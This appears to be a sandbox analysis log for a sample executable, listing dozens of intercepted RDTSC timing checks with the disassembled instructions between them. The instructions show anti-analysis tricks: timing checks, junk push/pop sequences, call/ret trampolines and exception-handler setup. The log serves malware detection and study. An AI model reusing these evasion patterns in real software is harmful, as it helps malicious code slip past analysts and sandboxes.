Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115D0EA second address: 115D120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98E0h 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007F66E96D98D6h 0x00000011 jmp 00007F66E96D98E5h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115C820 second address: 115C838 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F66E8B84A7Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115C838 second address: 115C83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115C83C second address: 115C850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115C9D9 second address: 115C9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F66E96D98D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115CF4F second address: 115CF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115CF55 second address: 115CF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115CF5B second address: 115CF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115CF60 second address: 115CF89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 je 00007F66E96D98F5h 0x0000000e jmp 00007F66E96D98E9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115CF89 second address: 115CF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115DD61 second address: 115DD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115DD65 second address: 115DD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115E063 second address: 115E06D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115E06D second address: 115E07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8B84A7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115E88B second address: 115E88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115E88F second address: 115E895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115E895 second address: 115E89A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115EA63 second address: 115EA69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115EC38 second address: 115EC3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115EC3E second address: 115EC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115EC42 second address: 115EC5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx edi, si 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jbe 00007F66E96D98D6h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115FAEF second address: 115FAF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115F976 second address: 115F97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1160252 second address: 1160257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1161322 second address: 1161327 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1161E92 second address: 1161E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11635D4 second address: 11635D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11635D9 second address: 11635E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11635E7 second address: 11635ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11635ED second address: 1163657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1E2Dh], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F66E8B84A78h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 and esi, dword ptr [ebp+122D399Ah] 0x0000002f xor edi, 40EB1B81h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F66E8B84A78h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 or dword ptr [ebp+122D2C85h], edi 0x00000057 clc 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1163657 second address: 116365B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11633B4 second address: 11633B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1164147 second address: 116414B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1167337 second address: 1167351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1167351 second address: 1167397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D19C3h], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F66E96D98D8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007F66E96D98DCh 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1167397 second address: 116739C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116739C second address: 11673A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11673A2 second address: 11673A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116928E second address: 1169294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1169294 second address: 1169298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1167523 second address: 1167529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11693E4 second address: 11693EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116A421 second address: 116A425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11693EF second address: 1169402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F66E8B84A76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F66E8B84A76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116D186 second address: 116D18B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116DF8C second address: 116DF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116D2C5 second address: 116D2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116D2CA second address: 116D37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F66E8B84A82h 0x00000010 jg 00007F66E8B84A7Ch 0x00000016 nop 0x00000017 mov di, C5E9h 0x0000001b push dword ptr fs:[00000000h] 0x00000022 or dword ptr [ebp+122D2E10h], edx 0x00000028 add edi, dword ptr [ebp+122D19F8h] 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 mov bx, 88A1h 0x00000039 mov eax, dword ptr [ebp+122D06F1h] 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F66E8B84A78h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D1C47h] 0x0000005f push FFFFFFFFh 0x00000061 push 00000000h 0x00000063 push ebx 0x00000064 call 00007F66E8B84A78h 0x00000069 pop ebx 0x0000006a mov dword ptr [esp+04h], ebx 0x0000006e add dword ptr [esp+04h], 0000001Bh 0x00000076 inc ebx 0x00000077 push ebx 0x00000078 ret 0x00000079 pop ebx 0x0000007a ret 0x0000007b je 00007F66E8B84A7Ch 0x00000081 mov edi, dword ptr [ebp+122D1C25h] 0x00000087 mov di, 5EEFh 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e ja 00007F66E8B84A7Ch 0x00000094 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1170F48 second address: 1170F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1171E3A second address: 1171E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1171E3E second address: 1171E48 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1171E48 second address: 1171E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1174C01 second address: 1174C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F66E96D98D6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1174C18 second address: 1174C8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66E8B84A78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F66E8B84A78h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jmp 00007F66E8B84A84h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F66E8B84A78h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e pop edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11700EB second address: 117010F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E96D98E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnl 00007F66E96D98E0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1172003 second address: 1172007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1172EC3 second address: 1172ED7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1175C7B second address: 1175CA4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, eax 0x0000000b push 00000000h 0x0000000d mov edi, 4548ADE6h 0x00000012 push 00000000h 0x00000014 xor dword ptr [ebp+1244C875h], ecx 0x0000001a push eax 0x0000001b jg 00007F66E8B84A84h 0x00000021 push eax 0x00000022 push edx 0x00000023 jnl 00007F66E8B84A76h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1174E6C second address: 1174E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1174E70 second address: 1174E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1174E74 second address: 1174E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F66E96D98DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1174E8B second address: 1174EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F66E8B84A8Dh 0x0000000e js 00007F66E8B84A7Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1175DAE second address: 1175E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 04027B47h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 cmc 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov dword ptr [ebp+122D1CF2h], edi 0x00000025 mov eax, dword ptr [ebp+122D15DDh] 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F66E96D98D8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 add bh, 00000036h 0x00000048 push FFFFFFFFh 0x0000004a mov edi, dword ptr [ebp+122D3956h] 0x00000050 nop 0x00000051 push ebx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jbe 00007F66E96D98D6h 0x0000005b popad 0x0000005c pop ebx 0x0000005d push eax 0x0000005e pushad 0x0000005f jmp 00007F66E96D98E0h 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F66E96D98E2h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1175E3A second address: 1175E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1179F51 second address: 1179F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1179F55 second address: 1179F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1186855 second address: 118687C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jc 00007F66E96D98D6h 0x0000000c jmp 00007F66E96D98DBh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F66E96D98DBh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 118687C second address: 1186880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 118CA9B second address: 118CAD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F66E96D98E0h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F66E96D98EDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 118CAD6 second address: 118CAE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8B84A7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 111BDC1 second address: 111BDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 111BDC7 second address: 111BDCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119533C second address: 1195360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E96D98E9h 0x00000007 pushad 0x00000008 jno 00007F66E96D98D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194098 second address: 11940E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A7Ah 0x00000009 pop ecx 0x0000000a jmp 00007F66E8B84A7Bh 0x0000000f pop edx 0x00000010 push eax 0x00000011 jmp 00007F66E8B84A85h 0x00000016 pushad 0x00000017 jmp 00007F66E8B84A80h 0x0000001c jg 00007F66E8B84A76h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11940E2 second address: 11940E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194A46 second address: 1194A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F66E8B84A76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194A52 second address: 1194A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194E25 second address: 1194E3E instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8B84A76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F66E8B84A7Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194F91 second address: 1194F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194F95 second address: 1194F9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E8B84A76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194F9F second address: 1194FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194FA5 second address: 1194FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8B84A7Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194FB8 second address: 1194FBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
